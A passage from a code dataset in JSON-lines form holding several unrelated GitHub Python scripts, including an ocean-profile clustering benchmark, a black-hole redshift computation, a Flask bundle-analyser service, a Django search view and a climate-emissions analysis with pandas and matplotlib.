sklearn.cluster.MiniBatchKMeans(n_clusters=k, n_init=10, max_iter=1000, batch_size=100)\n else:\n print(\"model used: GMM\")\n model = sklearn.mixture.GaussianMixture(n_components=k, max_iter=1000, tol=1e-6)\n model.fit(x[var_name_ds])\n return model\n\n\ndef predict(x, m, var_name_ds, k, var_predict):\n classif = m.predict(x[var_predict])\n x = x.assign(variables={\"labels\": ('sample_dim', classif)})\n q = [0.05, 0.5, 0.95]\n x = compute_quantile(x, var_name_ds, k, q)\n x = x.assign_coords(coords={'k': range(k)})\n x = x.unstack('sample_dim')\n return x\n\n\ndef generate_plots(ds, var_name_ds, k, algorithm):\n \"\"\"\n Generates and saves the following plots:\n - vertical structure: vertical structure of each classes. 
It draws the mean profile and the 0.05 and 0.95 quantiles\n - vertical structure comp: vertical structure graph but Quantiles are being plotted together to highlight\n differences between classes.\n - Spacial distribution: plot the PCM labels in a map to analyse the spatial coherence of classes.\n - Robustness: spacial distribution of a scaled probability of a profile to belong to a class.\n - Pie chart: pie chart showing the percentage of profiles belonging to each class and the number of\n classified profiles.\n - Temporal distribution by month: The bar plots represents the percentage of profiles in each class by month.\n - Temporal distribution by season: The bar plots represents the percentage of profiles in each class by season.\n Parameters\n ----------\n ds : Xarray dataset containing the predictions\n var_name_ds : name of the variable in the dataset\n\n Returns\n -------\n saves all the plots as png\n \"\"\"\n try:\n x_label = ds[var_name_ds].attrs['long_name'] + \" in \" + ds[var_name_ds].attrs['unit_long']\n except KeyError:\n x_label = var_name_ds\n\n # create a pyXpcm model to use the Plotter class\n var_name_mdl = var_name_ds\n z_dim = 'depth'\n z = ds[z_dim]\n pcm_features = {var_name_mdl: z}\n m = pcm(K=k, features=pcm_features)\n ds = ds.rename({'labels': 'PCM_LABELS'})\n ds = ds.sortby('latitude').sortby('longitude')\n P = Plotter(ds, m, coords_dict={'latitude': 'latitude', 'longitude': 'longitude', 'time': 'time', 'depth': 'depth'})\n\n # plot profiles by class\n P.vertical_structure(q_variable=var_name_ds + '_Q', sharey=True, xlabel=x_label)\n P.save_BlueCloud('vertical_struc.png')\n # plot profiles by quantile\n P.vertical_structure_comp(q_variable=var_name_ds + '_Q', plot_q='all', xlabel=x_label)\n P.save_BlueCloud('vertical_struc_comp.png')\n # spacial distribution\n P.spatial_distribution(time_slice='most_freq_label')\n P.save_BlueCloud('spatial_distr_freq.png')\n # robustness\n # P.plot_robustness(time_slice=first_date)\n # P.save_BlueCloud('robustness.png')\n # pie chart of the classes distribution\n P.pie_classes()\n P.save_BlueCloud('pie_chart.png')\n # temporal distribution (monthly)\n P.temporal_distribution(time_bins='month')\n P.save_BlueCloud('temporal_distr_months.png')\n # temporal distribution (seasonally)\n P.temporal_distribution(time_bins='season')\n P.save_BlueCloud('temporal_distr_season.png')\n # save data\n ds.to_netcdf('predicted_dataset.nc', format='NETCDF4')\n\n\ndef main():\n args = get_args()\n var_name_ds = args.var_name_ds\n var_name_mdl = args.var_name_mdl\n algorithm = args.algo\n k = args.k\n file_name = args.file_name\n exec_time_log = []\n for i in range(10):\n print(\"loading the dataset\")\n start_time = time.time()\n x = preprocessing_allin(path=file_name, scaling=True, multiple=False, backend='sk', var_name=var_name_ds)\n load_time = time.time() - start_time\n print(\"load finished in \" + str(load_time) + \"sec\")\n print(\"starting computation\")\n start_time = time.time()\n m = train_model(k=k, x=x, var_name_ds=var_name_ds + \"_scaled_reduced\", algo=algorithm)\n train_time = time.time() - start_time\n print(\"training finished in \" + str(train_time) + \"sec\")\n start_time = time.time()\n ds = predict(m=m, x=x, var_name_ds=var_name_ds, var_predict = var_name_ds + \"_scaled_reduced\", k=k)\n prediction_time = time.time() - start_time\n print(\"prediction finished in \" + str(prediction_time) + \"sec\")\n start_time = time.time()\n generate_plots(ds=ds, var_name_ds=var_name_ds, k=k, algorithm=algorithm)\n plot_time = time.time() 
- start_time\n        print(\"plot finished in \" + str(plot_time) + \"sec\")\n        tmp_log = {\n            'exec_nb': i,\n            'ncpu': 8,\n            'ram': 16,\n            'algorithm': algorithm,\n            'platform': \"Datarmor\",\n            'time_load': load_time,\n            'time_train': train_time,\n            'time_prediction': prediction_time,\n            'time_plot': plot_time,\n            'total_time': load_time + train_time + prediction_time + plot_time,\n            'file_size': (ds.nbytes / 1073741824),\n        }\n        exec_time_log.append(tmp_log)\n    pd.DataFrame(exec_time_log).to_csv(\"exec_time.csv\")\n    print(\"exec time saved\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"euroargodev/BlueCloud","sub_path":"speed_test/GMM_kmean.py","file_name":"GMM_kmean.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36010278132","text":"from aart_func import *\nfrom params import * \n\nprint(\"Computing the redshift factor at each point in the image plane \\n\")\n\nfnbands=path+\"LensingBands_a_%s_i_%s.h5\"%(spin_case,i_case)\n\nprint(\"Reading file: \",fnbands)\n\nh5f = h5py.File(fnbands,'r')\n\nsupergrid0=h5f['grid0'][:]\nmask0=h5f['mask0'][:]\nN0=int(h5f[\"N0\"][0])\n\nsupergrid1=h5f['grid1'][:]\nmask1=h5f['mask1'][:]\nN1=int(h5f[\"N1\"][0])\n\t\nsupergrid2=h5f['grid2'][:]\nmask2=h5f['mask2'][:]\nN2=int(h5f[\"N2\"][0])\n\nh5f.close()\n\nfnbands=path+\"Rays_a_%s_i_%s.h5\"%(spin_case,i_case)\n\nprint(\"Reading file: \",fnbands)\n\nh5f = h5py.File(fnbands,'r')\n\nrs0=h5f['rs0'][:]\nsign0=h5f['sign0'][:]\n#t0=h5f['t0'][:]\nphi0=h5f['phi0'][:]\n\nrs1=h5f['rs1'][:]\nsign1=h5f['sign1'][:]\n#t1=h5f['t1'][:]\nphi1=h5f['phi1'][:]\n\nrs2=h5f['rs2'][:]\nsign2=h5f['sign2'][:]\n#t2=h5f['t2'][:]\nphi2=h5f['phi2'][:]\n\nh5f.close()\n\n\ni_g0 = obsint.gfactorf(supergrid0,mask0,sign0,spin_case,isco,rs0,phi0,thetao)\ni_g1 = obsint.gfactorf(supergrid1,mask1,sign1,spin_case,isco,rs1,phi1,thetao)\ni_g2 = obsint.gfactorf(supergrid2,mask2,sign2,spin_case,isco,rs2,phi2,thetao)\n\ni_g0 = (i_g0).reshape(N0,N0).T\ni_g1 = (i_g1).reshape(N1,N1).T\ni_g2 = (i_g2).reshape(N2,N2).T\n\nfilename=path+\"gfactors_a_%s_i_%s.h5\"%(spin_case,i_case)\n\nh5f = h5py.File(filename, 'w')\nh5f.create_dataset('gs0', data=i_g0)\nh5f.create_dataset('gs1', data=i_g1)\nh5f.create_dataset('gs2', data=i_g2)\n\nh5f.close()\n","repo_name":"iAART/aart","sub_path":"gfactor.py","file_name":"gfactor.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"}
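gfactor.py above is a straight h5py read-compute-write round trip. A minimal self-contained sketch of that pattern (dataset names and sizes are placeholders):

```python
import h5py
import numpy as np

with h5py.File("in.h5", "w") as f:   # create a small input file for the demo
    f.create_dataset("grid0", data=np.arange(16.0))

with h5py.File("in.h5", "r") as f:   # read, as the script does with [:]
    grid0 = f["grid0"][:]

with h5py.File("out.h5", "w") as f:  # write the derived result
    f.create_dataset("gs0", data=grid0.reshape(4, 4).T)
```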
\"y\":\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Le country code n'a pas ete valide! Veuillez en encoder un nouveau!\")\n\t\texcept:\n\t\t\tprint(\"Le country code n'est pas valide!\")\n\n\twhile True:\n\t\taftr = input(\"Encodez l'AFTR: \")\n\t\tquestion = \"Validez-vous l'AFTR \" + aftr + \" ?\\n[Y]: Oui\\n[n]: Non\\n[exit]: Quitter le programme\\nReponse:\"\n\n\t\tif checkUserInput.question_and_verification(question) == \"y\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"L'AFTR n'a pas ete validee! Veuillez en encoder une nouvelle!\")\n\n\tset_nic_settings(aftr, countryCode)\n","repo_name":"BertrandKevin/Configuration-Folder","sub_path":"src/configureNic.py","file_name":"configureNic.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1419732348","text":"\nclass InvalidColorError (Exception):\n def __init__(self, message):\n super().__init__(message)\n\n\nclass ANSI:\n COLOR_ANSI = {\n 'white': '\\u001b[37m',\n 'grey': '\\u001b[38;5;243m',\n 'darkgrey': '\\u001b[38;5;233m',\n 'black': '\\u001b[30m',\n 'red': '\\u001b[31m',\n 'green': '\\u001b[32m',\n 'yellow': '\\u001b[33m',\n 'blue': '\\u001b[34m',\n 'magenta': '\\u001b[35m',\n 'cyan': '\\u001b[36m',\n 'orange': '\\u001b[38;5;208m',\n 'darkorange': '\\u001b[38;5;130m',\n 'darkgreen': '\\u001b[38;5;28m',\n 'purple': '\\u001b[38;5;92m',\n }\n\n RESET_ANSI = '\\u001b[0m'\n\n def get_color_ansi(color_name):\n if color_name in ANSI.COLOR_ANSI:\n return ANSI.COLOR_ANSI[color_name]\n else:\n raise InvalidColorError(f'color name: \"{color_name}\" is invalid')\n\n def reset_after_use(text):\n return f'{ANSI.RESET_ANSI}{text}{ANSI.RESET_ANSI}'\n","repo_name":"jampen/beautiful","sub_path":"src/ansi.py","file_name":"ansi.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17885233109","text":"#!/usr/bin/python\nfrom flask import Flask, request, jsonify, abort\nimport os\nimport ConfigParser\nimport multiprocessing\nimport atexit\nimport Bundle\n\ncurrentAppDir = os.path.dirname(__file__)\n\nconfigParser = ConfigParser.RawConfigParser()\nconfigParser.read( os.path.join( currentAppDir, 'analyser.cfg' ) )\n\ng_app = Flask(__name__, static_folder='', static_url_path='')\n\n\n# Pool for analysing jobs \ng_pool = multiprocessing.Pool(processes=4)\ng_sharedBundleDatas = {}\ng_enablePool = True\n\n# Manager to share analysing information\ng_manager = multiprocessing.Manager()\n\n@g_app.route('/', methods=['GET'])\ndef index():\n return \"Analyser service v1.0\"\n\n@g_app.route('/bundle/<bundleId>', methods=['POST'])\ndef analyseBundle(bundleId):\n '''\n Apply a pool of process to analyse bundles asynchronously.\n '''\n global g_sharedBundleDatas, g_pool, g_enablePool\n\n bundleBin = request.data\n bundleExt = request.headers.get('Content-Type')\n\n datas = g_sharedBundleDatas[bundleId] = g_manager.dict()\n\n datas['status'] = \"waiting\"\n datas['analyse'] = \"waiting\"\n datas['extraction'] = \"waiting\"\n datas['datas'] = None\n\n if g_enablePool:\n g_pool.apply(Bundle.launchAnalyse, args=[datas, bundleExt, bundleBin, bundleId])\n else:\n Bundle.launchAnalyse(datas, bundleExt, bundleBin, bundleId)\n\n return jsonify(**datas)\n\n@g_app.route('/bundle/<bundleId>', methods=['GET'])\ndef getStatus(bundleId):\n '''\n Return the analyse status.\n '''\n global g_sharedBundleDatas\n if bundleId not in g_sharedBundleDatas:\n g_app.logger.error('the id ' + 
+{"seq_id":"17885233109","text":"#!/usr/bin/python\nfrom flask import Flask, request, jsonify, abort\nimport os\nimport ConfigParser\nimport multiprocessing\nimport atexit\nimport Bundle\n\ncurrentAppDir = os.path.dirname(__file__)\n\nconfigParser = ConfigParser.RawConfigParser()\nconfigParser.read( os.path.join( currentAppDir, 'analyser.cfg' ) )\n\ng_app = Flask(__name__, static_folder='', static_url_path='')\n\n\n# Pool for analysing jobs \ng_pool = multiprocessing.Pool(processes=4)\ng_sharedBundleDatas = {}\ng_enablePool = True\n\n# Manager to share analysing information\ng_manager = multiprocessing.Manager()\n\n@g_app.route('/', methods=['GET'])\ndef index():\n    return \"Analyser service v1.0\"\n\n@g_app.route('/bundle/<bundleId>', methods=['POST'])\ndef analyseBundle(bundleId):\n    '''\n    Apply a pool of processes to analyse bundles asynchronously.\n    '''\n    global g_sharedBundleDatas, g_pool, g_enablePool\n\n    bundleBin = request.data\n    bundleExt = request.headers.get('Content-Type')\n\n    datas = g_sharedBundleDatas[bundleId] = g_manager.dict()\n\n    datas['status'] = \"waiting\"\n    datas['analyse'] = \"waiting\"\n    datas['extraction'] = \"waiting\"\n    datas['datas'] = None\n\n    if g_enablePool:\n        g_pool.apply(Bundle.launchAnalyse, args=[datas, bundleExt, bundleBin, bundleId])\n    else:\n        Bundle.launchAnalyse(datas, bundleExt, bundleBin, bundleId)\n\n    return jsonify(**datas)\n\n@g_app.route('/bundle/<bundleId>', methods=['GET'])\ndef getStatus(bundleId):\n    '''\n    Return the analyse status.\n    '''\n    global g_sharedBundleDatas\n    if bundleId not in g_sharedBundleDatas:\n        g_app.logger.error('the id ' + bundleId + ''' doesn't exist''')\n        abort(404)\n\n    return jsonify(**g_sharedBundleDatas[bundleId])\n\n@atexit.register\ndef quit():\n    '''\n    Close processes and quit pool at exit.\n    '''\n    global g_pool\n    g_pool.close()\n    g_pool.terminate()\n    g_pool.join()\n\nif __name__ == '__main__':\n    g_app.run(host=configParser.get('APP_ANALYSER', 'host'), port=configParser.getint('APP_ANALYSER', 'port'), debug=True)\n","repo_name":"mguiral/ShuttleOFX","sub_path":"analyser/runAnalyser.py","file_name":"runAnalyser.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"30892892201","text":"from django.shortcuts import redirect, render\nfrom Product.models import *\n\n# Create your views here.\n\ndef home(request):\n    if request.method == 'POST':\n        string = request.POST.get('search')\n        return redirect(search_view, string=string)\n    else:\n        all_products = Product.objects.all()\n        return render(request, 'Home/home.html', {'all_products': all_products})\n\ndef search_view(request,string):\n    if string is not None and string != '':\n        all_products = Product.objects.filter(name__contains=string)\n    else:\n        all_products = Product.objects.all()\n    return render(request, 'Home/search_result.html', {'all_products': all_products})","repo_name":"munim110/Sample-Ecommerce-Site-","sub_path":"Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14204202141","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\ndef process(cname, pname):\n    bazel_build = \"bazel build //\" + cname + \":\"+ pname\n    os.system(bazel_build)\n    print(\"\\n~~~ bin start ~~~\")\n    bazel_bin = \"./bazel-bin/\" + cname + \"/\" + pname\n    os.system(bazel_bin)\n    print(\"~~~ bin end ~~~\\n\")\n    os.system(\"bazel clean\")\n\n\ndef p02():\n    r = 100.0 * (85 - 72) / 85\n    print(f\"hello, the percentage is {r:.1f}\")\n\nscript, cname, pname = sys.argv\n\nif int(cname) < 10:\n    cname = \"0\" + cname\nif int(pname) < 10:\n    pname = \"0\" + pname\n\ncname = \"c\" + cname\npname = \"p\" + pname\nprocess(cname, pname)\n","repo_name":"weiweitong/system","sub_path":"linux/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2126314585","text":"# imports\r\n#region\r\nimport os\r\nimport pyreadstat\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom statsmodels.stats.weightstats import DescrStatsW\r\nfrom sklearn.linear_model import LinearRegression\r\nimport statsmodels.api as sm\r\nimport statsmodels.formula.api as smf\r\nimport seaborn as sns\r\nimport matplotlib as mpl\r\nmpl.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nfrom libs.utils import *\r\nfrom libs.plots import *\r\nfrom libs.extensions import *\r\nplt.ioff()\r\n#endregion\r\n\r\n\r\n# RESPEKT - source data ---\r\n\r\nroot = 'D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\111-emise-svet-srovnani\\\\data'\r\n\r\ndf = pd.read_csv(f'{root}\\\\data_all_w_edgar50.csv')\r\ndf.dtypes\r\n\r\ndf['edgar50_co2'] = df['edgar50_CO2_excl_short-cycle_org_C']\r\ndf['edgar50_co2_w_short'] = df['edgar50_co2'] + df['edgar50_CO2_org_short-cycle_C']\r\n# I am using the new sensitivities here, 28 and 265\r\ndf['edgar50_co2eq'] = 
df['edgar50_CO2_excl_short-cycle_org_C'] + 28 * df['edgar50_CH4'] + 265 * df['edgar50_N2O']\r\n# df['edgar50_co2eq'] = df['edgar50_CO2_excl_short-cycle_org_C'] + 25 * df['edgar50_CH4'] + 298 * df['edgar50_N2O']\r\ndf['edgar50_co2eq_w_short'] = df['edgar50_co2eq'] + df['edgar50_CO2_org_short-cycle_C']\r\n\r\ndf.query('year == 2015')['edgar50_co2eq'].sum() / 1e6\r\ndf.query('year == 2015')['edgar50_co2'].sum() / 1e6\r\n\r\ndata = df[['code', 'year', 'SP.POP.TOTL', 'NY.GDP.MKTP.PP.KD', 'edgar50_co2eq', 'edgar50_CO2_excl_short-cycle_org_C',\r\n 'edgar50_CH4', 'edgar50_N2O', 'edgar50_co2eq_w_short', 'edgar50_co2_w_short']] \\\r\n .rename(columns={'year': 'year_data', 'SP.POP.TOTL': 'pop', 'NY.GDP.MKTP.PP.KD': 'gdp', 'edgar50_co2eq': 'co2eq',\r\n 'edgar50_CO2_excl_short-cycle_org_C': 'co2', 'edgar50_CH4': 'ch4', 'edgar50_N2O': 'n2o',\r\n 'edgar50_co2eq_w_short': 'co2eq_w_short', 'edgar50_co2_w_short': 'co2_w_short'})\r\n\r\ndata['year_data'] = np.int_(data['year_data'])\r\n\r\nvars = ['pop', 'gdp', 'co2']\r\nd18 = data.dropna(subset=vars)\r\nvars15 = ['pop', 'gdp', 'co2', 'ch4', 'n2o', 'co2eq', 'co2eq_w_short']\r\nd15 = data.dropna(subset=vars15)\r\n\r\ncodes = pd.DataFrame({'code': np.sort(data['code'].unique())})\r\ncodes['year'] = np.int_(2018)\r\n\r\ncodes15 = pd.DataFrame({'code': np.sort(data['code'].unique())})\r\ncodes15['year'] = np.int_(2015)\r\n\r\nd18 = pd.merge_asof(codes, d18.sort_values('year_data'), by='code', left_on='year', right_on='year_data')\r\nd15 = pd.merge_asof(codes15, d15.sort_values('year_data'), by='code', left_on='year', right_on='year_data')\r\ncountries = pd.read_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\emission-intensity\\\\countries.csv')\r\ncountries = countries.rename(columns={'country_name': 'country', 'final_region': 'cont', 'final_region_en': 'cont_en',\r\n 'second_chart_region': 'region'}).drop(columns=['world_bank_region', 'wiki_region', 'final_region_full'])\r\ncountries.show_csv()\r\n\r\nd18 = pd.merge(d18, countries, how='inner')\r\nd15 = pd.merge(d15, countries, how='inner')\r\n\r\n# full edgar\r\n8710 * 265 + 369341.8 * 28 + 36311982 # 48.96 Gt\r\n\r\n# all aviation\r\n0.924726 / 48.96\r\n0.924726 / 36\r\n\r\n0.867139 / 49\r\n\r\n# SEA + AIR (roughly 60 % sea, 40 % air)\r\n117.4 * 265 + 503 * 28 + 1187011 # 1.23 Gt\r\n\r\n0.6 / 50\r\n\r\n16.2\r\n11.1 / 16.2\r\n\r\n0.6 * 16.2\r\n\r\n1.4 / 11.1\r\n\r\n194\r\n128\r\n128 / 194\r\n0.6 * 194\r\n(128 - 0.6 * 194) / 128\r\n\r\n(194 + 116) / 2\r\n\r\n160 / 194\r\n\r\n\r\nd18.to_parquet('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d18.parquet')\r\nd15.to_parquet('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d15.parquet')\r\n\r\nd18 = d18.dropna(subset=vars)\r\nd18['year_data'] = np.int_(d18['year_data'])\r\nd15 = d15.dropna(subset=vars15)\r\nd15['year_data'] = np.int_(d15['year_data'])\r\n\r\nd15['short_ratio'] = d15['co2eq_w_short'] / d15['co2eq']\r\n\r\nd15.show_csv()\r\n\r\nd15.co2.sum() / 1e6\r\nd15.co2eq.sum() / 1e6\r\nd15.co2_w_short.sum() / 1e6\r\nd15.co2eq_w_short.sum() / 1e6\r\nd15['pop'].sum() / 1e9\r\n\r\n0.6 / 40\r\n\r\nd18.show_csv()\r\n\r\nd15['pop'].sum()\r\nd18['pop'].sum()\r\n\r\nconts = countries[['region', 'cont', 'cont_en']].drop_duplicates().dropna().reset_index(drop=True)\r\nconts.show_csv()\r\n\r\nd15.show_csv()\r\n\r\nd15_agg = d15.groupby('region')[['pop', 'co2eq', 'gdp']].sum().reset_index()\r\nd15_agg['co2eq_per_pop'] = d15_agg.eval('1000 * co2eq / pop')\r\nd15_agg['co2eq_per_gdp'] = d15_agg.eval('1000000000 * co2eq / gdp')\r\n\r\nd18_agg = 
d18.groupby('region')[['pop', 'co2', 'gdp']].sum().reset_index()\r\nd18_agg['co2_per_pop'] = d18_agg.eval('1000 * co2 / pop')\r\nd18_agg['co2_per_gdp'] = d18_agg.eval('1000000000 * co2 / gdp')\r\n\r\nd18_agg.to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d18_agg.csv', index=False)\r\nd15_agg.to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d15_agg.csv', index=False)\r\n\r\n\r\nd15['co2eq_per_pop'] = d15.eval('1000 * co2eq / pop')\r\nd15['co2eq_per_gdp'] = d15.eval('1000000000 * co2eq / gdp')\r\n\r\nd18['co2_per_pop'] = d18.eval('1000 * co2 / pop')\r\nd18['co2_per_gdp'] = d18.eval('1000000000 * co2 / gdp')\r\n\r\ncols = ['code', 'country', 'year', 'year_data', 'pop', 'gdp']\r\nd18[cols + ['co2', 'co2_per_pop', 'co2_per_gdp']] \\\r\n .to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d18_countries.csv', index=False)\r\nd15[cols + ['co2eq', 'co2eq_per_pop', 'co2eq_per_gdp']] \\\r\n .to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d15_countries.csv', index=False)\r\n\r\nd15.query('co2eq_per_pop > 12.2') # 28th\r\nd18.query('co2_per_pop > 10.5') # 21st\r\n\r\n\r\nd15_agg.show_csv()\r\n\r\n# PER CAPITA ---\r\nd15_pop = d15_agg.sort_values('co2eq_per_pop', ascending=False).reset_index(drop=True)\r\nd15_pop['start'] = d15_pop['pop'].cumsum().shift(1)\r\nd15_pop.loc[0, 'start'] = 0\r\nd15_pop['end'] = d15_pop['pop'].cumsum()\r\n\r\nd18_pop = d18_agg.sort_values('co2_per_pop', ascending=False).reset_index(drop=True)\r\nd18_pop['start'] = d18_pop['pop'].cumsum().shift(1)\r\nd18_pop.loc[0, 'start'] = 0\r\nd18_pop['end'] = d18_pop['pop'].cumsum()\r\n\r\n# charts\r\n\r\nplt.rcParams['figure.figsize'] = 12, 7\r\n\r\nfig15pop, ax15pop = plt.subplots()\r\npatches = []\r\nfor i in d15_pop.index:\r\n plt.text(d15_pop['end'].loc[i] + i * 6e6 + 2e7 - 0.5 * d15_pop['pop'].loc[i], d15_pop['co2eq_per_pop'].loc[i] + 0.4,\r\n d15_pop['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((d15_pop['start'].loc[i] + i * 6e6, 0), d15_pop['pop'].loc[i],\r\n d15_pop['co2eq_per_pop'].loc[i])\r\n patches.append(rec)\r\n\r\nax15pop.add_collection(mpl.collections.PatchCollection(patches))\r\nax15pop.set(xlim=(0, 8e9), ylim=(0, 36))\r\nax15pop.set(xlabel='Population', ylabel='t CO2eq per capita', title='CO2eq emissions per capita (2015)')\r\n\r\nfig18pop, ax18pop = plt.subplots()\r\npatches = []\r\nfor i in d18_pop.index:\r\n plt.text(d18_pop['end'].loc[i] + i * 6e6 + 2e7 - 0.5 * d18_pop['pop'].loc[i], d18_pop['co2_per_pop'].loc[i] + 0.4,\r\n d18_pop['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((d18_pop['start'].loc[i] + i * 6e6, 0), d18_pop['pop'].loc[i],\r\n d18_pop['co2_per_pop'].loc[i])\r\n patches.append(rec)\r\n\r\nax18pop.add_collection(mpl.collections.PatchCollection(patches))\r\nax18pop.set(xlim=(0, 8e9), ylim=(0, 36))\r\nax18pop.set(xlabel='Population', ylabel='t CO2 per capita', title='CO2 emissions per capita (2018)')\r\n\r\n# PER GDP ---\r\nd15_gdp = d15_agg.sort_values('co2eq_per_gdp', ascending=False).reset_index(drop=True)\r\nd15_gdp['start'] = d15_gdp['gdp'].cumsum().shift(1)\r\nd15_gdp.loc[0, 'start'] = 0\r\nd15_gdp['end'] = d15_gdp['gdp'].cumsum()\r\nfor x in ['gdp', 'start', 'end']:\r\n d15_gdp[x] = d15_gdp[x] / 1e9\r\n\r\nd18_gdp = d18_agg.sort_values('co2_per_gdp', ascending=False).reset_index(drop=True)\r\nd18_gdp['start'] = d18_gdp['gdp'].cumsum().shift(1)\r\nd18_gdp.loc[0, 'start'] = 0\r\nd18_gdp['end'] = d18_gdp['gdp'].cumsum()\r\nfor x in ['gdp', 'start', 'end']:\r\n d18_gdp[x] = d18_gdp[x] / 
1e9\r\n\r\nd15_gdp.show_csv()\r\n\r\nfig15gdp, ax15gdp = plt.subplots()\r\npatches = []\r\nfor i in d15_gdp.index:\r\n    plt.text(d15_gdp['end'].loc[i] + i * 2e2 + 5e2 - 0.5 * d15_gdp['gdp'].loc[i], d15_gdp['co2eq_per_gdp'].loc[i] + 0.4,\r\n             d15_gdp['region'].loc[i], rotation=45)\r\n    rec = mpl.patches.Rectangle((d15_gdp['start'].loc[i] + i * 2e2, 0), d15_gdp['gdp'].loc[i],\r\n                                d15_gdp['co2eq_per_gdp'].loc[i])\r\n    patches.append(rec)\r\n\r\nax15gdp.add_collection(mpl.collections.PatchCollection(patches))\r\nax15gdp.set(xlim=(0, 1.2e5), ylim=(0, 1200))\r\nax15gdp.set(xlabel='GDP PPP (const intl $, billion)', ylabel='g CO2eq per $', title='CO2eq emissions per GDP (2015)')\r\n\r\nfig18gdp, ax18gdp = plt.subplots()\r\npatches = []\r\nfor i in d18_gdp.index:\r\n    plt.text(d18_gdp['end'].loc[i] + i * 2e2 + 5e2 - 0.5 * d18_gdp['gdp'].loc[i], d18_gdp['co2_per_gdp'].loc[i] + 0.4,\r\n             d18_gdp['region'].loc[i], rotation=45)\r\n    rec = mpl.patches.Rectangle((d18_gdp['start'].loc[i] + i * 2e2, 0), d18_gdp['gdp'].loc[i],\r\n                                d18_gdp['co2_per_gdp'].loc[i])\r\n    patches.append(rec)\r\n\r\nax18gdp.add_collection(mpl.collections.PatchCollection(patches))\r\nax18gdp.set(xlim=(0, 1.3e5), ylim=(0, 1000))\r\nax18gdp.set(xlabel='GDP PPP (const intl $, billion)', ylabel='g CO2 per $', title='CO2 emissions per GDP (2018)')\r\n\r\n# ax18gdp.show()\r\n\r\nChart([ax15pop, ax18pop, ax15gdp, ax18gdp]).show()\r\n\r\n\r\n\r\n\r\n\r\n\r\nfig, ax = plt.subplots()\r\npatches = []\r\n\r\nfor i in df.index:\r\n    plt.text(df['end'].loc[i] + i * 1e7 + 2e7 - 0.5 * df['pop'].loc[i], df['co2_per_capita'].loc[i] + 0.4,\r\n             df['region'].loc[i], rotation=45)\r\n    rec = mpl.patches.Rectangle((df['start'].loc[i] + i * 1e7, 0), df['pop'].loc[i],\r\n                                df['co2_per_capita'].loc[i])\r\n    patches.append(rec)\r\n\r\nax.add_collection(mpl.collections.PatchCollection(patches))\r\nax.set(xlim=(0, 7.5e9), ylim=(0, 36))\r\nax.show()\r\n\r\n\r\n\r\n\r\n\r\ndata.show()\r\n\r\nno_years = data.groupby('code')['year_data'].count().rename('count').reset_index()\r\nmax_pop = data.groupby('code')['pop'].max().reset_index()\r\n\r\npop_years = pd.merge(no_years, max_pop)\r\npop_years['pop'].sum() # 7_248_361_589\r\npop_years[pop_years['count'] < 26]['pop'].sum() # 139_046_348\r\npop_years[pop_years['count'] == 26]['pop'].sum() # 7_109_315_241\r\n\r\npop_years[pop_years['count'] == 23]['pop']\r\ncountries.dtypes\r\n\r\ncountries = pd.merge(countries, pop_years)\r\n\r\ncountries.final_region.drop_duplicates()\r\n\r\ndata\r\n\r\nregions = pd.merge(data, countries[countries['count'] == 26][['code', 'final_region']])\r\n# regions.final_region.drop_duplicates()\r\nregions.loc[regions.final_region == 'Evropská unie', 'final_region'] = 'Evropa'\r\nregions.loc[regions.final_region == 'Spojené státy americké', 'final_region'] = 'Severní Amerika'\r\nworld = regions.drop(columns=['code', 'final_region']).groupby(['year_data']).sum().reset_index()\r\n\r\ncze = regions[regions.code == 'CZE'].copy()\r\ncze['final_region'] = 'Česká republika'\r\nregions = pd.concat([regions, cze])\r\nregions = regions.drop(columns=['code']).groupby(['final_region', 'year_data']).sum().reset_index()\r\n# regions.show()\r\n\r\nregions['ghg_per_cap'] = 1_000 * regions['co2eq'] / regions['pop'] # t CO2eq / capita\r\nregions['ghg_per_gdp'] = 1_000_000 * regions['co2eq'] / regions['gdp_ppp'] # kg CO2eq / $\r\nregions['gdp_per_cap'] = regions['gdp_ppp'] / regions['pop']\r\nregions['co2eq'] = regions['co2eq'] / 1_000_000 # Gt CO2\r\nregions['gdp_ppp'] = regions['gdp_ppp'] / 1_000_000 # million $\r\nregions['pop'] = regions['pop'] / 1_000_000_000 # billion
